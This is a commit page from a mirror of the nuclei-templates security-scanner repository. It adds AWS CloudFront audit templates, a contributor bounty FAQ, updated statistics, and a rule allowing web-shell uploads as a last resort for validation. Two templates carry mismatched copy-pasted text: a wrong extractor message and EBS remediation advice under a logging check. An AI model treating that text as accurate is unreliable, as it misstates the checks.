daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'main' into patch-16

patch-13
Prince Chaddha 2024-11-04 00:59:52 +05:30 committed by GitHub
parent 449c2092cf 05e1b631d3
commit 9a92502583
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
628 changed files with 15828 additions and 6936 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

91
.new-additions
View File

@ -1,66 +1,25 @@
code/cves/2024/CVE-2024-4340.yaml
code/cves/2024/CVE-2024-45409.yaml
http/cves/2017/CVE-2017-5871.yaml
http/cves/2019/CVE-2019-19411.yaml
http/cves/2021/CVE-2021-25094.yaml
http/cves/2021/CVE-2021-40272.yaml
http/cves/2023/CVE-2023-0676.yaml
http/cves/2023/CVE-2023-27641.yaml
http/cves/2023/CVE-2023-39007.yaml
http/cves/2023/CVE-2023-4151.yaml
http/cves/2023/CVE-2023-47105.yaml
http/cves/2024/CVE-2024-3234.yaml
http/cves/2024/CVE-2024-32964.yaml
http/cves/2024/CVE-2024-35627.yaml
http/cves/2024/CVE-2024-3753.yaml
http/cves/2024/CVE-2024-38816.yaml
http/cves/2024/CVE-2024-43160.yaml
http/cves/2024/CVE-2024-43917.yaml
http/cves/2024/CVE-2024-45440.yaml
http/cves/2024/CVE-2024-46627.yaml
http/cves/2024/CVE-2024-4940.yaml
http/cves/2024/CVE-2024-5488.yaml
http/cves/2024/CVE-2024-6517.yaml
http/cves/2024/CVE-2024-7354.yaml
http/cves/2024/CVE-2024-7714.yaml
http/cves/2024/CVE-2024-7854.yaml
http/cves/2024/CVE-2024-8021.yaml
http/cves/2024/CVE-2024-8877.yaml
http/default-logins/datagerry/datagerry-default-login.yaml
http/default-logins/netdisco/netdisco-default-login.yaml
http/exposed-panels/dockwatch-panel.yaml
http/exposed-panels/enablix-panel.yaml
http/exposed-panels/gitlab-explore.yaml
http/exposed-panels/gitlab-saml.yaml
http/exposed-panels/loxone-web-panel.yaml
http/exposed-panels/m-bus-panel.yaml
http/exposed-panels/macos-server-panel.yaml
http/exposed-panels/riello-netman204-panel.yaml
http/exposed-panels/rstudio-panel.yaml
http/exposed-panels/saia-pcd-panel.yaml
http/exposed-panels/workspace-one-uem-ssp.yaml
http/exposures/logs/action-controller-exception.yaml
http/exposures/logs/delphi-mvc-exception.yaml
http/exposures/logs/expression-engine-exception.yaml
http/exposures/logs/lua-runtime-error.yaml
http/exposures/logs/mako-runtime-error.yaml
http/exposures/logs/microsoft-runtime-error.yaml
http/exposures/logs/mongodb-exception-page.yaml
http/exposures/logs/sap-logon-error-message.yaml
http/exposures/logs/twig-runtime-error.yaml
http/miscellaneous/seized-site.yaml
http/misconfiguration/ariang-debug-console.yaml
http/misconfiguration/microsoft/aspnetcore-dev-env.yaml
http/misconfiguration/netdisco/netdisco-unauth.yaml
http/technologies/arcgis-detect.yaml
http/technologies/dizquetv-detect.yaml
http/technologies/ivanti-epm-detect.yaml
http/technologies/microsoft/default-azure-function-app.yaml
http/technologies/vertigis-detect.yaml
http/technologies/wiki-js-detect.yaml
http/technologies/windows-communication-foundation-detect.yaml
http/token-spray/api-delighted.yaml
http/token-spray/api-intigriti.yaml
http/token-spray/api-telegram.yaml
http/vulnerabilities/retool/retool-svg-xss.yaml
http/vulnerabilities/wordpress/ninja-forms-xss.yaml
cloud/aws/cloudfront/cloudfront-compress-object.yaml
cloud/aws/cloudfront/cloudfront-custom-certificates.yaml
cloud/aws/cloudfront/cloudfront-geo-restriction.yaml
cloud/aws/cloudfront/cloudfront-insecure-protocol.yaml
cloud/aws/cloudfront/cloudfront-integrated-waf.yaml
cloud/aws/cloudfront/cloudfront-logging-disabled.yaml
cloud/aws/cloudfront/cloudfront-origin-shield.yaml
cloud/aws/cloudfront/cloudfront-security-policy.yaml
cloud/aws/cloudfront/cloudfront-traffic-unencrypted.yaml
cloud/aws/cloudfront/cloudfront-viewer-policy.yaml
code/cves/2014/CVE-2014-0160.yaml
file/logs/aspnet-framework-exceptions.yaml
file/logs/nodejs-framework-exceptions.yaml
http/cves/2019/CVE-2019-1003000.yaml
http/cves/2024/CVE-2024-4841.yaml
http/cves/2024/CVE-2024-6420.yaml
http/exposed-panels/cyberpanel-panel.yaml
http/exposed-panels/quivr-panel.yaml
http/iot/ip-webcam.yaml
http/miscellaneous/azure-blob-core-detect.yaml
http/technologies/hubble-detect.yaml
http/technologies/localai-detect.yaml
http/technologies/pghero-detect.yaml
http/technologies/wordpress/plugins/burst-statistics.yaml
http/vulnerabilities/backdoor/lottie-backdoor.yaml

1
CONTRIBUTING.md
View File

@ -56,6 +56,7 @@ Along with the P.O.C following are the required fields in the info section for s
- If there are more than 1 template for a tech create a separate folder for it
- Don't share any vulnerable URL publicly on Github or Discord channel.
- We should only upload a web shell as a last resort to validate the vulnerability, and if we do upload a file, make sure the file name is random(`{{randstr}}`)
- Do not include code templates for exploits that can be written using HTTP or JavaScript. We avoid adding additional exploit code to the project unless there is an exception.
### **Submitting a PR**

75
Community-Rewards-FAQ.md Normal file
View File

@ -0,0 +1,75 @@
# Nuclei Templates Community Rewards Program - FAQ
## What is the purpose of this rewards program?
The program is designed to reward the community for their efforts in contributing high-quality templates for critical and trending vulnerabilities.
## What are the bounty ranges for template submissions?
Bounties range from **$50 to $250**, depending on the complexity of the template and the effort required.
## Where can I find bounty issues?
Only issues listed by us on our GitHub repository with the 💎 **Bounty** label are eligible for rewards. You can find these bounty issues [here](https://github.com/projectdiscovery/nuclei-templates/issues?q=is%3Aissue%20state%3Aopen%20label%3A%22%F0%9F%92%8E%20Bounty%22)
## What is the acceptance criteria for templates?
Templates must meet the following criteria:
1. **Complete POC**: A full Proof of Concept (POC) must be provided and not rely solely on version detection.
2. **Debug Data**: Include debug data to assist with template validation.
3. **Validation Required**: The template will be reviewed and validated before rewards are given.
4. **Accurate Matchers**: Use strong matchers to avoid false positives.
> **Note**: Triagers will make the final decision on whether a template qualifies for a reward based on validation and the acceptance criteria outlined.
## How do I start working on a bounty issue?
1. **Find an Issue**: Look for issues tagged with 💎 **Bounty**.
2. **Declare Work**: Comment with `/attempt #<issue_number>` to claim the issue.
3. **Submit Work**: Submit your pull request with `/claim #<issue_number>` in the PR description when ready.
## How often are new bounty issues added?
We add new bounty issues on a **weekly basis**, so make sure to check back regularly for fresh opportunities. In the future, you can expect many more bounty issues as the program expands, allowing more opportunities for contributors to participate and earn rewards.
## Can I collaborate with others?
Yes, you can collaborate with other contributors and split rewards by commenting:
```
/claim #<issue_number>
/split @contributor1
/split @contributor2
```
## Is there a limit to how many issues I can work on?
You can work on up to **3 issues** simultaneously.
## What happens if I dont complete an issue on time?
Issues must be completed within **2 months**, or they will be closed.
## How are rewards distributed?
Rewards are distributed once the template is fully validated. If the issue remains unresolved for **few weeks**, the bounty may increase.
## What should I include in my template submission?
Include the following:
- **Complete POC**: A working Proof of Concept.
- **Matchers**: Multiple matchers to prevent false positives.
- **Debug Data**: Data to assist the triage team in validation.
- **Metadata**: Include required fields like `id`, `name`, `author`, `severity`, `description`, and `reference`.
## What types of templates will be rejected?
Templates may be rejected if they:
- Rely solely on version detection.
- Lack a complete POC.
- Contain weak matchers or redundant changes to existing templates.
## What should I avoid when submitting a template?
- Avoid sharing real-world targets publicly.
- Dont submit templates with weak matchers.
- Avoid unnecessary changes to existing templates.
## Is there a leaderboard for contributors?
Yes! We now have a **leaderboard** that showcases top contributors. You can check it out here: [Leaderboard](https://cloud.projectdiscovery.io/templates/leaderboard).
## Is this program permanent?
The rewards program is currently a test run, but we may make changes based on community feedback.
## What additional rewards are available besides bounties?
Beyond bounties, we also reward contributors with:
- **Swag** such as t-shirts and stickers.
- **Invites to security conferences** for standout contributors.
- **Stickers** as a token of appreciation for all first-time contributors, regardless of the bounty.
> Contributors who feel their pull request or issue was overlooked for first-time contributor stickers can ping us on our Discord for assistance: [ProjectDiscovery Discord](https://discord.com/invite/projectdiscovery).

20
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2743 | dhiyaneshdk | 1397 | http | 7977 | info | 3855 | file | 402 |
| panel | 1201 | daffainfo | 866 | file | 402 | high | 2033 | dns | 25 |
| wordpress | 1035 | dwisiswant0 | 802 | cloud | 325 | medium | 1727 | | |
| exposure | 994 | princechaddha | 497 | workflows | 192 | critical | 1145 | | |
| xss | 945 | pussycat0x | 451 | network | 137 | low | 279 | | |
| wp-plugin | 904 | ritikchaddha | 445 | code | 82 | unknown | 43 | | |
| cve | 2824 | dhiyaneshdk | 1456 | http | 8128 | info | 3910 | file | 402 |
| panel | 1225 | daffainfo | 866 | file | 402 | high | 2069 | dns | 25 |
| wordpress | 1057 | dwisiswant0 | 802 | cloud | 353 | medium | 1784 | | |
| exposure | 999 | princechaddha | 498 | workflows | 192 | critical | 1175 | | |
| xss | 975 | ritikchaddha | 479 | network | 137 | low | 284 | | |
| wp-plugin | 920 | pussycat0x | 452 | code | 84 | unknown | 43 | | |
| osint | 807 | pikpikcu | 353 | javascript | 65 | | | | |
| tech | 722 | pdteam | 302 | ssl | 30 | | | | |
| lfi | 712 | ricardomaia | 243 | dast | 25 | | | | |
| misconfig | 710 | geeknik | 231 | dns | 22 | | | | |
| tech | 736 | pdteam | 302 | ssl | 30 | | | | |
| misconfig | 718 | ricardomaia | 243 | dast | 26 | | | | |
| lfi | 716 | geeknik | 231 | dns | 22 | | | | |
**718 directories, 9584 files**.
**736 directories, 9771 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

11707
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

18
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2743 | dhiyaneshdk | 1397 | http | 7977 | info | 3855 | file | 402 |
| panel | 1201 | daffainfo | 866 | file | 402 | high | 2033 | dns | 25 |
| wordpress | 1035 | dwisiswant0 | 802 | cloud | 325 | medium | 1727 | | |
| exposure | 994 | princechaddha | 497 | workflows | 192 | critical | 1145 | | |
| xss | 945 | pussycat0x | 451 | network | 137 | low | 279 | | |
| wp-plugin | 904 | ritikchaddha | 445 | code | 82 | unknown | 43 | | |
| cve | 2824 | dhiyaneshdk | 1456 | http | 8128 | info | 3910 | file | 402 |
| panel | 1225 | daffainfo | 866 | file | 402 | high | 2069 | dns | 25 |
| wordpress | 1057 | dwisiswant0 | 802 | cloud | 353 | medium | 1784 | | |
| exposure | 999 | princechaddha | 498 | workflows | 192 | critical | 1175 | | |
| xss | 975 | ritikchaddha | 479 | network | 137 | low | 284 | | |
| wp-plugin | 920 | pussycat0x | 452 | code | 84 | unknown | 43 | | |
| osint | 807 | pikpikcu | 353 | javascript | 65 | | | | |
| tech | 722 | pdteam | 302 | ssl | 30 | | | | |
| lfi | 712 | ricardomaia | 243 | dast | 25 | | | | |
| misconfig | 710 | geeknik | 231 | dns | 22 | | | | |
| tech | 736 | pdteam | 302 | ssl | 30 | | | | |
| misconfig | 718 | ricardomaia | 243 | dast | 26 | | | | |
| lfi | 716 | geeknik | 231 | dns | 22 | | | | |

61
cloud/aws/cloudfront/cloudfront-compress-object.yaml Normal file
View File

@ -0,0 +1,61 @@
id: cloudfront-compress-object
info:
name: CloudFront Compress Objects Automatically
author: DhiyaneshDK
severity: low
description: |
Ensure that your Amazon CloudFront Content Delivery Network (CDN) distributions are configured to automatically compress content for web requests that include "Accept-Encoding: gzip" in the request header, in order to increase the websites/web applications performance and reduce bandwidth costs.
impact: |
Disabling "Compress Objects Automatically" in CloudFront can lead to increased data transfer costs and slower page load times, negatively impacting user experience and performance.
remediation: |
Enable "Compress Objects Automatically" in CloudFront to reduce data transfer sizes, enhance loading speeds, and improve overall performance for end users.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/compress-objects-automatically.html
- https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/ServingCompressedFiles.html
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution-config --id $distribution --query 'DistributionConfig.CacheBehaviors.Items[*].Compress' --region $region --output text
matchers:
- type: word
words:
- "False"
extractors:
- type: dsl
dsl:
- '"CloudFront Compress Objects Automatically " + distribution + " is Disabled"'
# digest: 490a00463044022049dd48306c6c158a96f198e145cc789b3470759ea27f11f4eee8dcbcd1a02782022063234ed30fb1eb259bddcc79bef550ca731a8923594dadb47ae744ddceb508cf:922c64590222798bb761d5b6d8e72950

61
cloud/aws/cloudfront/cloudfront-custom-certificates.yaml Normal file
View File

@ -0,0 +1,61 @@
id: cloudfront-custom-certificates
info:
name: Cloudfront Custom SSL/TLS Certificates - In Use
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Amazon CloudFront distributions are configured to use a custom SSL/TLS certificate instead of the default one.
impact: |
Failing to use custom SSL/TLS certificates in CloudFront can result in trust issues with end users, exposing your web content to man-in-the-middle attacks and potentially damaging your brand's reputation due to untrusted connection warnings.
remediation: |
Configure your Amazon CloudFront distribution to use custom SSL/TLS certificates to ensure secure and trusted connections for your users, enhancing data protection and maintaining brand integrity.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-distro-custom-tls.html
- https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/CNAMEs.html
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution --region $region --id $distribution --query 'Distribution.DistributionConfig.ViewerCertificate.CloudFrontDefaultCertificate' --output text
matchers:
- type: word
words:
- "False"
extractors:
- type: dsl
dsl:
- '"Cloudfront Custom SSL/TLS Certificates " + distribution + " In Use"'
# digest: 4a0a00473045022100da635117b120204e1672952e41f6ee3ed6dabf0747f609179b0f67d5a69d075b02205b7689dcdc0580def61f7365313c333d14cab3be5e87ced20955c329501c674d:922c64590222798bb761d5b6d8e72950

61
cloud/aws/cloudfront/cloudfront-geo-restriction.yaml Normal file
View File

@ -0,0 +1,61 @@
id: cloudfront-geo-restriction
info:
name: CloudFront Geo Restriction - Not Enabled
author: DhiyaneshDK
severity: info
description: |
Ensure that geographic restriction is enabled for your Amazon CloudFront CDN distributions in order to allow or block viewers from specific locations (countries) from accessing your web content.
impact: |
Not enabling Geo Restriction in CloudFront exposes content to users from unauthorized regions, increasing the risk of content misuse, compliance violations, and potential security threats.
remediation: |
Enable Geo Restriction in CloudFront to control access to content based on geographic locations, ensuring only authorized users from designated regions can access specific resources.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/geo-restriction.html
- https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/georestrictions.html
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution-config --id $distribution --query "DistributionConfig.Restrictions.GeoRestriction.RestrictionType" --region $region --output text
matchers:
- type: word
words:
- "none"
extractors:
- type: dsl
dsl:
- '"CloudFront Compress Objects Automatically " + distribution + " is Disabled"'
# digest: 4a0a004730450220142b520c987e8f2bcfdf0ae5bac12ebf324e825707c1ddd75291b2ff70b53f39022100ec5ac177b54af99c6215cf891d48ad55e8e7fead07e40e32ecbf13085ca6bf09:922c64590222798bb761d5b6d8e72950

61
cloud/aws/cloudfront/cloudfront-insecure-protocol.yaml Normal file
View File

@ -0,0 +1,61 @@
id: cloudfront-insecure-protocol
info:
name: CloudFront Insecure Origin SSL Protocols
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Amazon CloudFront Content Delivery Network (CDN) distributions are not using insecure SSL protocols (i.e. SSLv3) for HTTPS communication between CloudFront edge locations and custom origins.
impact: |
Insecure SSL protocols for CloudFront origins can expose sensitive data to interception and compromise, increasing the risk of man-in-the-middle attacks.
remediation: |
Configure your CloudFront distribution to enforce the use of secure SSL/TLS protocols (TLS 1.2 or higher) for all origins and disable support for outdated protocols like SSLv3 and TLS 1.0/1.1.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-insecure-origin-ssl-protocols.html
- http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/SecureConnections.html
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.Origins.Items[*].CustomOriginConfig.OriginSslProtocols.Items | []' --region $region --output json
matchers:
- type: word
words:
- "SSLv3"
extractors:
- type: dsl
dsl:
- '"CloudFront Uses SSLv3 Protocol in" + distribution'
# digest: 4b0a00483046022100fdc0ce1c8723e90fb04a9afeefa22c4a2688c89157b4f1c5c6be4a243dcf9213022100d12140b15551ef3d20a7877e4e31b370371ab0d4127a3bb56b53a6363387acd9:922c64590222798bb761d5b6d8e72950

67
cloud/aws/cloudfront/cloudfront-integrated-waf.yaml Normal file
View File

@ -0,0 +1,67 @@
id: cloudfront-integrated-waf
info:
name: CloudFront Integrated With WAF
author: DhiyaneshDK
severity: medium
description: |
Ensure that all your Amazon CloudFront distributions are integrated with the Amazon Web Application Firewall (WAF) service to protect against application-layer attacks that can compromise the security of your websites/web applications or place unnecessary load on them
impact: |
Lack of integration between CloudFront and a Web Application Firewall (WAF) increases vulnerability to web-based attacks, including DDoS, SQL injection, and cross-site scripting (XSS).
remediation: |
Integrate CloudFront with an appropriate Web Application Firewall (WAF) to filter and monitor HTTP requests, providing enhanced protection against common web threats.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-integrated-with-waf.html
- http://docs.aws.amazon.com/waf/latest/developerguide/what-is-aws-waf.html
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.WebACLId' --region $region --output json
matchers-condition: and
matchers:
- type: word
words:
- '""'
- type: word
words:
- 'arn:'
negative: true
extractors:
- type: dsl
dsl:
- '"CloudFront Integrated With WAF " + distribution + " is Disabled"'
# digest: 4a0a00473045022100a36dcab2a207e696447d68b0dce85fe832262f87ce1b46b55dedec2d0d1211c902206af51e44f15794e01470f3e31dae926ca281d793cb43438e67acfa8bfa8b3525:922c64590222798bb761d5b6d8e72950

61
cloud/aws/cloudfront/cloudfront-logging-disabled.yaml Normal file
View File

@ -0,0 +1,61 @@
id: cloudfront-logging-disabled
info:
name: Cloudfront Logging Disabled
author: DhiyaneshDK
severity: medium
description: |
Ensure that access (standard) logging is enabled for your Amazon CloudFront distributions in order to track all viewer requests for the web content delivered through the Content Delivery Network (CDN).
impact: |
Disabling CloudFront logging reduces visibility into traffic patterns, hinders incident response and forensic analysis, compromises compliance efforts, and limits troubleshooting capabilities, increasing security risks.
remediation: |
Enable encryption for all existing EBS volumes and ensure that all new volumes created are configured to use encryption by default. Additionally, update any snapshots to be encrypted and use AWS Key Management Service (KMS) to manage encryption keys securely.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-logging-enabled.html
- http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/AccessLogs.html
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.Logging.Enabled' --region $region --output text
matchers:
- type: word
words:
- "False"
extractors:
- type: dsl
dsl:
- '"Cloudfront Logging " + distribution + " is Disabled"'
# digest: 4a0a0047304502206dc958b5b8b2f929d7f5416fe53425745b6f54d4d8d2c929f92aa508189202aa0221008b22fee11b75ecdf6da6c22803d8a6b55552f8be2910f60ce5dccf686fb892b8:922c64590222798bb761d5b6d8e72950

61
cloud/aws/cloudfront/cloudfront-origin-shield.yaml Normal file
View File

@ -0,0 +1,61 @@
id: cloudfront-origin-shield
info:
name: CloudFront Origin Shield - Not Enabled
author: DhiyaneshDK
severity: info
description: |
Ensure that the Origin Shield performance optimization feature is enabled for all your Amazon CloudFront distributions in order to help reduce the load on your distribution's origin, improve its availability, and reduce its operating costs.
impact: |
Not enabling CloudFront Origin Shield can lead to increased load on your origin server, higher latency, and greater costs due to more frequent requests during traffic spikes.
remediation: |
Enable CloudFront Origin Shield for your distributions to optimize cache efficiency, reduce load on your origin server, and improve content delivery performance during high traffic periods.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/enable-origin-shield.html
- https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/origin-shield.html
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution-config --id $distribution --query 'DistributionConfig.Origins.Items[*].OriginShield.Enabled' --region $region --output text
matchers:
- type: word
words:
- "False"
extractors:
- type: dsl
dsl:
- '"CloudFront Origin Shield " + distribution + " not Enabled"'
# digest: 4a0a00473045022032e6b219a62c0fa94878575c07b5a4e05b088c8784f3ffdd724353a64d73e165022100f8a3cd82c152bd084c703fe67574a40a91c12ba1372d1cd9c4c0e4584b72a4be:922c64590222798bb761d5b6d8e72950

65
cloud/aws/cloudfront/cloudfront-security-policy.yaml Normal file
View File

@ -0,0 +1,65 @@
id: cloudfront-security-policy
info:
name: CloudFront Security Policy
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Amazon CloudFront distributions are using a security policy with minimum TLSv1.2 or TLSv1.3 and appropriate security ciphers for HTTPS viewer connections.
impact: |
Failing to use a security policy with a minimum of TLSv1.2 or TLSv1.3 and appropriate ciphers for HTTPS viewer connections in CloudFront can expose sensitive data to interception and reduce the overall security of your application.
remediation: |
Configure your Amazon CloudFront distributions to use a security policy that enforces a minimum of TLSv1.2 or TLSv1.3 and specifies secure ciphers for HTTPS viewer connections.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/security-policy.html
- https://aws.amazon.com/about-aws/whats-new/2017/09/amazon-cloudfront-now-lets-you-select-a-security-policy-with-minimum-tls-v1_1-1_2-and-security-ciphers-for-viewer-connections/
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.ViewerCertificate.MinimumProtocolVersion' --region $region --output json
matchers:
- type: word
words:
- '"TLSv1"'
- '"TLSv1_2016"'
- '"TLSv1.1_2016"'
- '"TLSv1.2_2018"'
- '"TLSv1.2_2019"'
extractors:
- type: dsl
dsl:
- '"CloudFront Uses Insecure Protocols " + distribution'
# digest: 490a00463044022019cb76f463fd374301b04d91953274d0df2e3c81f325c2ca914ec8cd7292228a02206d121f3f2cb668cf74b765e168580e8d34c7367d81c680a9cea321b457a9f37e:922c64590222798bb761d5b6d8e72950

61
cloud/aws/cloudfront/cloudfront-traffic-unencrypted.yaml Normal file
View File

@ -0,0 +1,61 @@
id: cloudfront-traffic-unencrypted
info:
name: CloudFront Traffic To Origin Unencrypted
author: DhiyaneshDK
severity: medium
description: |
Ensure that the communication between your Amazon CloudFront distributions and their custom origins is encrypted using HTTPS in order to secure the delivery of your web content and fulfill compliance requirements for encryption in transit.
impact: |
Unencrypted traffic between CloudFront and custom origins can expose sensitive data during transmission, leading to potential data breaches and non-compliance with encryption standards.
remediation: |
Ensure that all communications between your Amazon CloudFront distributions and custom origins are encrypted by configuring them to use HTTPS, thereby securing the delivery of web content and meeting compliance requirements for encryption in transit.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-traffic-to-origin-unencrypted.html
- http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/SecureConnections.html
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.Origins.Items[*].CustomOriginConfig.OriginProtocolPolicy' --region $region --output json
matchers:
- type: word
words:
- '"http-only"'
extractors:
- type: dsl
dsl:
- '"CloudFront " + distribution + " uses HTTP Only"'
# digest: 4a0a004730450220510c7757a3c8d77dcafbd819fb087db60a3243f239bdbd580f241f16f493279002210099bb7f3694be216d0aac7e02bc4c8926ba258745185e6213f44a8695460a7cd2:922c64590222798bb761d5b6d8e72950

61
cloud/aws/cloudfront/cloudfront-viewer-policy.yaml Normal file
View File

@ -0,0 +1,61 @@
id: cloudfront-viewer-policy
info:
name: CloudFront Viewer Protocol Policy
author: DhiyaneshDK
severity: medium
description: |
Ensure that the communication between your Amazon CloudFront distribution and its viewers is encrypted using HTTPS in order to secure the delivery of your web content.
impact: |
Failing to enforce HTTPS for viewer connections in CloudFront can expose web content to interception and manipulation, compromising the security and integrity of sensitive data transmitted between users and the distribution
remediation: |
Configure your Amazon CloudFront distribution's viewer protocol policy to either redirect HTTP requests to HTTPS or require HTTPS connections exclusively, ensuring secure delivery of web content and protecting against potential data breaches.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/viewer-protocol-policy.html
- https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/distribution-web-values-specify.html
tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DistributionListItemsId of iterate(template.distributions)){
set("distribution", DistributionListItemsId)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
extractors:
- type: json
name: distributions
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws cloudfront get-distribution-config --id $distribution --query 'DistributionConfig.CacheBehaviors.Items[*].ViewerProtocolPolicy' --output json --region $region
matchers:
- type: word
words:
- '"allow-all"'
extractors:
- type: dsl
dsl:
- '"CloudFront Viewer Policy " + distribution + " allows all"'
# digest: 4b0a00483046022100d710e5ab5c7940783bf341bf221f46d1cfe6638e4d33b69cc03a589e3cb0705302210084f5e59cda9f7b0e3fff5500b00eb922fae079e988ce96a49a04de2dc15f9cfc:922c64590222798bb761d5b6d8e72950

59
cloud/aws/dms/dms-multi-az.yaml Normal file
View File

@ -0,0 +1,59 @@
id: dms-multi-az
info:
